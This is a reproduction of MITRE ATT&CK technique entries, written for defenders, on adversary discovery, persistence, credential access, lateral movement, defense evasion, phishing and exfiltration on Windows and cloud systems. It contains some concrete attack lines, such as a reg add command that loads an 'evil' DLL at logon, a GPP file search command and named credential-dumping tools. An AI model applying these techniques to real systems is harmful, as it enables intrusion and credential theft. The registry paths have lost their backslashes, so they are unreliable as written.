Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Example commands that can be used to obtain security software information are netsh, reg query with Reg, dir with cmd, and Tasklist, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software. Adversaries may also utilize the Cloud API to discover cloud-native security software installed on compute infrastructure, such as the AWS CloudWatch agent, Azure VM Agent, and Google Cloud Monitor agent. These agents may collect metrics and logs from the VM, which may be centrally aggregated in a cloud-based monitoring platform.
T1543.003 Create or Modify System Process: Windows Service
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via Native API functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. Modify Registry), or by using command-line utilities such as `PnPUtil.exe`. Adversaries may leverage these drivers as Rootkits to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of Exploitation for Privilege Escalation. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through Service Execution. To make detection analysis more challenging, malicious services may also incorporate Masquerade Task or Service (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create ‘hidden’ services (i.e., Hide Artifacts), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level. The following run keys are created by default on Windows systems: * HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun * HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce * HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun * HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce Run keys may exist under multiple hives. The HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx001Depend /v 1 /d "C:tempevil[.]dll" Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:Users\[Username]AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup. The startup folder path for all users is C:ProgramDataMicrosoftWindowsStart MenuProgramsStartUp. The following Registry keys can be used to set startup folder items for persistence: * HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders * HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders * HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShell Folders * HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerUser Shell Folders The following Registry keys can control automatic startup of services during boot: * HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesOnce * HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServicesOnce * HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices * HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServices Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: * HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun * HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun Programs listed in the load value of the registry key HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows run automatically for the currently logged-on user. By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINESystemCurrentControlSetControlSession Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLMSoftware[\Wow6432Node\]MicrosoftWindows NTCurrentVersionWinlogon and HKCUSoftwareMicrosoftWindows NTCurrentVersionWinlogon are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: * WinlogonNotify - points to notification package DLLs that handle Winlogon events * WinlogonUserinit - points to userinit.exe, the user initialization program executed when a user logs on * WinlogonShell - points to explorer.exe, the system shell executed when a user logs on Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.
T1550.002 Use Alternate Authentication Material: Pass the Hash
Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. When performing PtH, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform Pass the Ticket attacks.
T1552.006 Unsecured Credentials: Group Policy Preferences
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts. These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public). The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files: * Metasploit’s post exploitation module: post/windows/gather/credentials/gpp * Get-GPPPassword * gpprefdecrypt.py On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: dir /s * .xml
T1553.002 Subvert Trust Controls: Code Signing
Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature, this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. Code signing certificates may be used to bypass security policies that require signed code to execute on a system.
T1555.004 Credentials from Password Stores: Windows Credential Manager
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults). The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of Credentials from Web Browsers, Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker. Credential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%Users\[Username]AppDataLocalMicrosoft\[Vault/Credentials]`. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials. Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as CredEnumerateA, may also be absued to list credentials managed by the Credential Manager. Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running rundll32.exe keymgr.dll KRShowKeyMgr then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI. Password recovery tools may also obtain plain text passwords from the Credential Manager.
T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay
By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.  Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder.
T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting
Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to Brute Force. Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service). Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials. This same behavior could be executed using service tickets captured from network traffic. Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.
T1560.001 Archive Collected Data: Archive via Utility
Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. Remote Data Staging). xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use certutil to Base64 encode collected data before exfiltration. Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.
T1562.001 Impair Defenses: Disable or Modify Tools
Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems. Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to Indicator Blocking, adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection. Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlWMIAutologgerEventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging. On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot. In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor. Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools. For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems. Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. Exploitation for Privilege Escalation), which may lead to bypassing anti-tampering features.
T1566.001 Phishing: Spearphishing Attachment
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
T1566.002 Phishing: Spearphishing Link
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging User Execution. The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack"). URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`. Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to Steal Application Access Tokens. These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. Adversaries may also utilize spearphishing links to Steal Application Access Tokens that grant immediate access to the victim environment. For example, a user may be lured through “consent phishing” into granting adversaries permissions/access via a malicious OAuth 2.0 request URL . Similarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as “device code phishing,” an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet. Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.
T1569.002 System Services: Service Execution
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services. The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and Net. PsExec can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API. Tools such as PsExec and sc.exe can accept remote servers as arguments and may be used to conduct remote execution. Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with Windows Service during service persistence or privilege escalation.
T1570 Lateral Tool Transfer
Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., Ingress Tool Transfer) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB/Windows Admin Shares to connected network shares or with authenticated connections via Remote Desktop Protocol. Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and ftp. In some cases, adversaries may be able to leverage Web Services such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.
T1585.002 Establish Accounts: Email Accounts
Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct Phishing for Information or Phishing. Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to Acquire Infrastructure for follow-on purposes. Adversaries may also take steps to cultivate a persona around the email account, such as through use of Social Media Accounts, to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: Domains). To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.
T1588.002 Obtain Capabilities: Tool
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: PsExec). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as Cobalt Strike. Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions. Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).
T1588.003 Obtain Capabilities: Code Signing Certificates
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. Prior to Code Signing, adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.

© 2022 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.